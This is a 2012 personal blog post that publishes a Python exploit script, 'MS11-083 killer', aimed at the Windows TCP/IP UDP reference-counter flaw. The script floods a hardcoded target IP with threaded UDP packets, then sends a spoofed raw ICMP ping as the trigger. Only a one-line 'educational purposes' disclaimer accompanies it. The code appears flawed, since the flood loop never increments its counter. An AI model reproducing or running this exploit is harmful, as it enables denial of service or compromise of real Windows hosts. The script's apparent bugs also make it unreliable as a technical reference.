______ Y ______

My own personal time capsule.

MS11-083 killer

Leave a comment Posted by on January 26, 2012

Following code will attempt to exploit the MS11-083 by sending specially crafted packets to closed UDP port ( read more here). 

import socket
import threading

try:
    from dpkt.ip import IP                            
    from dpkt.icmp import ICMP
except:
    print "install dpkt if you want this program to run!"


print "[+] MS11-083 killer by Y"
print "[+] contact : If you know me then give me a shout"

############ EDIT THIS #################
UDP_IP="192.168.93.15"
UDP_PORT=839
MESSAGE="\x44\x44\x44\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00"
ThreadCount = 32
########################################

print " [+]UDP target IP:", UDP_IP
print " [+]UDP target port:", UDP_PORT
print " [+]UDP payload lenght:", len(MESSAGE)

def customPing(UDP_IP,repeat):
    # craft custom ping
    dataCC = "\xCC\xCC\xCC\xCC\xCC\xCC"
    ip = IP(src='\x01\x02\x03\x04', dst=UDP_IP, p=1)
    icmp = ICMP(type=8, data=ICMP.Echo(id=123, seq=1, data=dataCC))
    ip.data = icmp
    ip.len += len(ip.data)
    print "[+] Building socket for final ping"
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW)
    s.connect((UDP_IP, 1))
    # sending packet
    print "[+] Sending final ping ( debug trap ) "
    for x in range(10):
        s.send(str(ip))

try:
  print "\t[+] Running UDP attack against -> ", UDP_IP , "on port " , UDP_PORT 
  s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
  s.setblocking(0) # set non-blocking mode
  class ThreadClass(threading.Thread):
      def run(self):
          c = 0
          while c<(4294967296/ThreadCount): # 2^32 requests to overflow the counter

              s.sendto( MESSAGE, (UDP_IP,UDP_PORT ))
          # trigger the actual attack via ICMP messages ( the payload can probably trigger command execution !?)
          print "[+] Triggering actual attack "
          customPing(UDP_IP,20)
         
  for i in range(ThreadCount):
      t = ThreadClass()
      t.start()
      print "[+] Thread ",i," is starting and its name is : " , t.getName()
      
except Exception,e:
   print " [-] Exception occured, reason : " , e

Note that this code is only for the educational purposes and I do not take the responsibility for any missuses.

exploit, ms, python, windows , , , ,

Leave a comment